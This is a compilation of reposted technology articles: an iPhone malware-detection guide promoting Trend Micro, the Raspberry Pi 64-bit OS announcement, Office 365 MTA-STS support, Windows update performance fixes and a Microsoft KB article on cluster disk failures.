One particularly big sign of a malware infection is if your iPhone is using much more data than normal. Follow the instructions below to check:

  1. Go to either Settings > Cellular or Settings > Mobile Data (depending on which version of iOS you have, it will be different).
  2. You will then be able to check exactly how much data you’ve used in the current period. If it is significantly higher than you’re used to, search through the list of apps and look for any that you don’t recognize or remember installing. If any of them are using up a lot of data, you should strongly consider deleting them because they could be malicious.

Step #2 — Check for battery-hogging apps 

Some forms of malware can run in the background without you even being aware of it, consuming huge amounts of your iPhone’s resources and having a significant impact on how long its battery lasts. As a result, similar to an increase in data usage, a sudden increase in battery usage is another red flag that indicates that your iPhone may have a problem. Here’s how you can check:

  1. Navigate to Settings and select Battery.
  2. Choose either Last 24 hours or Last 10 Days.
  3. You can now see every app’s battery usage during the selected time period. Just like checking for high data usage, if you see any unusual apps that are using up a lot of battery, you should delete them.

Step #3 — Check for strange apps

Malware comes in many different varieties. While it is true that many consume a lot of battery and data, it is not the case for all malicious apps. Because of this, you also need to simply scan through every app installed on your iPhone and look for ones you don’t recognize.

This step may take a while, especially if you’ve installed lots of them, but scan through all your apps and search for ones that you don’t recognize. Every time you see an unfamiliar one, you should remove it.

Step #4 — Constantly being bothered by pop-ups?

If you’re always being bombarded by ads every time you surf the web on your iPhone, it’s a very strong sign that it has been infected by adware, which is a particular form of malware. Although it is generally considered one of the less dangerous types of malware, it can still be very annoying. If you’re suffering from this issue, but you were unable to find any malicious apps while following the previous steps, you should move on to the next step.

Step #5 — Run a malware scan

If you were unsuccessful in detecting any malware-infected apps while following the instructions in the previous steps and your iPhone is still behaving unusually, you need to run a malware scan — Trend Micro Mobile Security  works perfectly for this!

Trend Micro Mobile Security can protect you against malicious apps, ransomware, dangerous websites, unsafe Wi-Fi networks, and more. Ridding your iPhone of malware simply couldn’t be any easier! Click the button below to download.Get Mobile Security

Some of Trend Micro Mobile Security ’s awesome features include:

  • Surf anywhere —Prevent mobile apps from loading dangerous and risky websites when you browse.
  • Stop threats —Rely on the cloud-based Smart Protection Network™ and Mobile App Reputation technology to stop threats before they can reach you.
  • Avoid online scams and fraud —Flag malicious phishing emails and scam websites.
  • Improve performance — Take advantage of optimization features to make your mobile devices work better.

    Source :
    https://news.trendmicro.com/2022/01/26/how-to-detect-malware-on-iphone-5-steps/

Raspberry Pi OS (64-bit)

Over the past year, we’ve been trialling a beta of Raspberry Pi OS in glorious 64-bit. Now it’s time to open it up to a wider audience.

raspberry pi os 64-bit

The ARMv8-A architecture, which encompasses the 64-bit AArch64 architecture and associated A64 instruction set, was first introduced into the Raspberry Pi line with Raspberry Pi 3 in 2016. From that point on, it has been possible to run a full 64-bit operating system on our flagship products, and many third-party operating systems are available. However, we have continued to build our Raspberry Pi OS releases on the 32-bit Raspbian platform, aiming to maximise compatibility between devices and to avoid customer confusion.

ProductProcessorARM coreDebian/Raspbian ARM
port (maximum)		Architecture
width
Raspberry Pi 1BCM2835ARM1176arm6hf32 bit
Raspberry Pi 2BCM2836Cortex-A7armhf32 bit
Raspberry Pi ZeroBCM2835ARM1176arm6hf32 bit
Raspberry Pi Zero 2BCM2710Cortex-A53arm6464 bit
Raspberry Pi 3BCM2710Cortex-A53arm6464 bit
Raspberry Pi 4BCM2711Cortex-A72arm6464 bit

As you can see from the table above, it is easy to be confused about which products will support which Debian/Raspbian ports. Using arm6hf (Raspbian’s derivative of armhf with ARMv7-only instructions removed but floating-point instructions retained) provides us with an operating system which will run on every device we have ever manufactured, all the way back to 2011.

But we’ve come to realise that there are reasons to choose a 64-bit operating system over a 32-bit one. Compatibility is a key concern: many closed-source applications are only available for arm64, and open-source ones aren’t fully optimised for the armhf port. Beyond that there are some performance benefits intrinsic to the A64 instruction set: today, these are most visible in benchmarks, but the assumption is that these will feed through into real-world application performance in the future.

A more theoretical concern is that 32-bit pointers only allow you to address 4GB of memory. On Raspberry Pi 4, we use the ARM Large Physical Address Extension (LPAE) to access up to 8GB of memory, subject to the constraint that any process is limited to accessing 3GB (we reserve the top 1GB of the virtual address space for the kernel). Very few processes require more memory than this: happily Chromium, which is probably the most memory-intensive application in Raspberry Pi OS, spawns a process per tab. But some use cases will benefit from being able to allocate the entire memory of an 8GB Raspberry Pi 4 from a single process.

The 64-bit version of Chromium, installed by default, has no version of the WidevineCDM library and therefore, it is not possible to play streaming media such as Netflix or Disney+.  To instead choose the 32-bit version just do the following within a terminal window:

sudo apt install chromium-browser:armhf libwidevinecdm0

To return to the 64-bit version

sudo apt install chromium-browser:arm64 libwidevinecdm0-

So, head to the downloads page and grab your copy of 64-bit Raspberry Pi OS today. Let us know in the comments if your use case benefits (or suffers!) from the move to 64-bit.

Source :
https://www.raspberrypi.com/news/raspberry-pi-os-64-bit/

Microsoft Office 365 boosts email security against MITM, downgrade attacks

Microsoft has added SMTP MTA Strict Transport Security (MTA-STS) support to Exchange Online to ensure Office 365 customers’ email communication integrity and security.

Redmond first announced MTA-STS’ introduction in September 2020, after revealing that it was also working on adding inbound and outbound support for DNSSEC (Domain Name System Security Extensions) and DANE for SMTP (DNS-based Authentication of Named Entities).

“We have been validating our implementation and are now pleased to announce support for MTA-STS for all outgoing messages from Exchange Online,” the Exchange Online Transport Team said today.

With MTA-STS now available in Office 365, emails sent by users via Exchange Online will only be delivered using connections with both authentication and encryption, protecting the messages from interception and attack attempts.

This new standard strengthens Exchange Online email security and solves several SMTP security problems, including expired TLS certificates, the lack of support for secure protocols, and certificates not issued by trusted third parties or matching server domain names.

Before MTA-STS, emails sent through improperly secured TLS connections were exposed to various attacks, including downgrade and man-in-the-middle attacks.

“Downgrade attacks are possible where the STARTTLS response can be deleted, thus rendering the message in cleartext. Man-in-the-middle (MITM) attacks are also possible, whereby the message can be rerouted to an attacker’s server,” the Exchange team said.

“MTA-STS (RFC8461) helps thwart such attacks by providing a mechanism for setting domain policies that specify whether the receiving domain supports TLS and what to do when TLS can’t be negotiated, for example stop the transmission.”

Microsoft provides guidance on how to adopt MTA-STS, including where to host the policy file on your domain’s web infrastructure.https://www.youtube.com/embed/VY3YvrrHXJk

DANE for SMTP support also rolling out

Redmond is still working on rolling out DANE for SMTP (with DNSSEC support), which provides better protection for SMTP connections than MTA-STS does.

“We will deploy support for DANE for SMTP and DNSSEC in two phases. The first phase, DANE and DNSSEC for outbound email (from Exchange Online to external destinations), is slowly being deployed between now and March 2022. We expect the second phase, support for inbound email, to start by the end of 2022,” said The Exchange Team on Tuesday.

“We’ve been working on support for both MTA-STS and DANE for SMTP. At the very least, we encourage customers to secure their domains with MTA-STS,” Microsoft added today.

“You can use both standards on the same domain at the same time, so customers are free to use both when Exchange Online offers inbound protection using DANE for SMTP by the end of 2022. By supporting both standards, you can account for senders who may support only one method.”

Microsoft has already secured several domains it uses for email transport as a domain owner itself, including primary domains like outlook.com, hotmail.com, and live.com. 

This ensures that all connections from senders who support MTA-STS are better protected from man-in-the-middle attacks. 

Source :
https://www.bleepingcomputer.com/news/microsoft/office-365-boosts-email-security-against-mitm-downgrade-attacks/

Microsoft Windows 10 optional updates fix performance problems introduced last month

Optional updates for Windows 10 and Windows 11 released in January have fixed performance problems when playing games, using the operating system, or even opening folders in File Explorer.

With the January 2022 updates, Microsoft introduced numerous bugs breaking LT2P VPN connections, causing domain controller reboots, and preventing Hyper-V from working.

Microsoft later released out-of-band updates to fix these issues, whose fixes were also rolled into the optional preview updates.

However, these optional updates seem to have fixed more than the reported bugs, as they are also resolving significant performance issues caused by the January updates.

Recent Windows updates caused performance hits

After installing the January 2022 KB5009543 update, Windows 10 users began to notice that Windows suffered from severe performance issues.

These performance issues included slow boots and slow response times when opening the Start Menu, launching apps, playing games, and performing pretty much all of the basic functions of the operating system. In general, Windows felt “laggy” after installing the updates.

“Prior to the update, it took maybe 2 minutes for my laptop to boot to the home screen. It now takes close to a half hour. I’m frustrated to the point where I’m now planning to disable updates and uninstall this update,” a user named Ninja_Bobcat posted on Reddit.

“This update has ruined my laptop in games, namely warzone and apex. Goes to 0 fps and huge stutters everywhere,” another person posted.

“My computer is incredibly slow after KB5009543 security update and KB5008876 windows update. It takes about 3 minutes for my computer to boot and maybe 2-3 minutes to open a tab on chrome. Absolutely killed my computer,” said a third Windows 10 user.

BleepingComputer replicated these performance issues after installing the January 2022 KB5009543 update on multiple laptops.

The good news is that BleepingComputer found that installing the optional KB5009596 preview update released late last month fixed these newly introduced performance issues.

Windows 10 KB5009596 optional update
Windows 10 KB5009596 optional update

However, as these updates are optional, many users will not know to install them. Thus, their performance issues will continue until the mandatory February 2022 Patch Tuesday updates are installed, which will include these fixes.

Windows users can install the optional updates by going into Settings, clicking on Windows Update, and manually performing a ‘Check for Updates.’

As this is an optional update, you will need to install the KB5009596 by clicking on the ‘Download and install’ link.

Windows 11 issues were fixed as well

Not to be outdone by Windows 10, Windows 11 has also been dealing with performance issues within File Explorer.

Users found that it was slow to switch between folders, browse folders, or select files when using File Explorer.

However, the optional Windows 11 KB5008353 cumulative update preview has resolved these issues, with users reporting that File Explorer is back to normal.

“I honestly lost hope because this issue has been there since I upgraded to Win11, other users were claiming it was solved but it wasn’t the case for everyone. However, this update seems to have fixed this issue for good amongst others of course,” a Windows 11 user posted on Reddit.

BleepingComputer has not been able to replicate the performance issues on Windows 11 to test the fix.

BleepingComputer has also reached out to Microsoft with further questions about what has been fixed but has not received a reply as of yet.

Source :
https://www.bleepingcomputer.com/news/microsoft/windows-10-optional-updates-fix-performance-problems-introduced-last-month/

A physical disk resource may not come online on a Microsoft cluster node

This article helps solve an issue where a physical disk resource doesn’t come online on a cluster node.

Applies to:   Windows Server 2012 R2
Original KB number:   981475

Symptoms

On a cluster node that is running Windows Server, a physical disk resource may enter the Failed state when you try to move a group that contains the physical disk resource. If you restart the cluster node that has the physical disk resource that did not come online, the problem is temporarily resolved.

When this problem occurs, the following entries are logged in the Cluster log for the physical disk resource that entered the failed state:

000020cc.000014d0::<DateTime> ERR Physical Disk <Disk Q:>:
DiskspCheckPath: GetFileAttrs(Q:) returned status of 87.
000020cc.000014d0::<DateTime> WARN Physical Disk <Disk Q:>:
DiskspCheckDriveLetter: Checking drive name (Q:) returns 87

Additionally, the following events are logged in the System Event log:

Event Type: Error
Event Source: ClusSvc
Event Category: Physical Disk Resource
Event ID: 1066
Date: <date>
Time: <time>
User: N/A
Computer: <node name>
Description: Cluster disk resource “Disk Q:” is corrupt. Run ‘ChkDsk /F’ to repair problems. The volume name for this resource is “<\?\Volume{4323d41e-1379-11dd-9538-001e0b20dfe6}>”. If available, ChkDsk output will be in the file “C:\WINDOWS\Cluster\ChkDsk_Disk2_SigB05E593B.log”. ChkDsk may write information to the Application Event Log with Event ID 26180.

Event Type: Error
Event Source: ClusSvc
Event Category: Physical Disk Resource
Event ID: 1035
Date: <date>
Time: <time>
User: N/A
Computer: <node name>
Description: Cluster disk resource ‘Disk Q:’ could not be mounted.

Similarly, on a Windows Server cluster node you may see following entries are logged in the Cluster log:

00000db0.00000868::<DateTime> WARN [RES] Physical Disk <Cluster Disk 1>: OnlineThread: Failed to get volume guid for device \?\GLOBALROOT\Device\Harddisk15\Partition1. Error 3
00000db0.00000868::<DateTime> WARN [RES] Physical Disk <Cluster Disk 1>: OnlineThread: Failed to set volguid ??\Volume{3cb36133-0d0b-11df-afcf-005056ab58b9}. Error: 183.
00000db0.00000868::<DateTime> INFO [RES] Physical Disk <Cluster Disk 1>: VolumeIsNtfs: Volume \?\GLOBALROOT\Device\Harddisk15\Partition1\ has FS type NTFS

Cause

This problem is known to occur when antivirus software that is not cluster-aware is installed, upgraded, or reconfigured. For example, this problem is known to occur after you install or migrate to Symantec Endpoint Protection 11.0 Release Update 5 (RU5) on the cluster nodes.

Resolution

To resolve this problem, follow these steps:

  1. Verify that this problem is caused by Symantec Endpoint Protection (SEP) 11.0 Release Update 5 (RU5). To do this, run the Handle.exe utility immediately after the issue occurs on the cluster node where the physical disk resource did not come online.At an elevated command prompt, type the following command, and then press ENTER: Handle.exe -a -u drive_letter. NoteThe drive_letter placeholder is the drive designation for the cluster drive that did not come online.For example, assume that the drive designation for the cluster drive that did not come online is drive Q. To run the Handle.exe utility in this scenario, type the following command, and then press ENTER: Handle.exe -a -u Q:.The problem is caused by the Symantec application if you receive the following message that identifies the Smc.exe process as the process that owns the handle:Handle v3.42
    Copyright (C) 1997-2008 Mark Russinovich
    Sysinternals – www.sysinternals.comSmc.exe pid: 856 NT AUTHORITY\SYSTEM 66C: Q:
  2. If the problem is caused by the Symantec application, contact Symantec to obtain Symantec Endpoint Protection 11 Release Update 6 (RU6), which was released to resolve this issue.

More information

For more information about the Handle.exe utility, see Handle v4.22.

The third-party products that this article discusses are manufactured by companies that are independent of Microsoft. Microsoft makes no warranty, implied or otherwise, about the performance or reliability of these products.

Source :
https://docs.microsoft.com/en-us/troubleshoot/windows-server/high-availability/physical-disk-resource-not-come-online

Exit mobile version